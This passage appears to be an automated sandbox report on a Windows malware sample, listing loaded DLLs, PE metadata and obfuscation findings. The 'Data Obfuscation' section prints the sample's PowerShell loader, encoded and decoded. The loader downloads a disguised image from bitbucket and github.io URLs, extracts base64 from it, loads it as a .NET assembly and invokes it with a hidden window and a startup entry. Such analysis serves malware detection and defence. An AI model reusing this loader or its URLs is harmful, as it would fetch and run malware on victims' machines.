            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exeSection loaded: msvcp140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: Vbc.exe, 0000000B.00000000.2276937183.00000000001F1000.00000020.00000001.01000000.0000000A.sdmp, Vbc.exe.9.dr
            Source: Binary string: wextract.pdb source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
            Source: Binary string: wextract.pdbGCTL source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
            Source: Binary string: vbc.pdb source: Vbc.exe, 0000000B.00000000.2276937183.00000000001F1000.00000020.00000001.01000000.0000000A.sdmp, Vbc.exe.9.dr
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@
u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ
@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.drbfojS/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Vbc', '0'))}}" .exe -windowstyle hidden -exec
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@B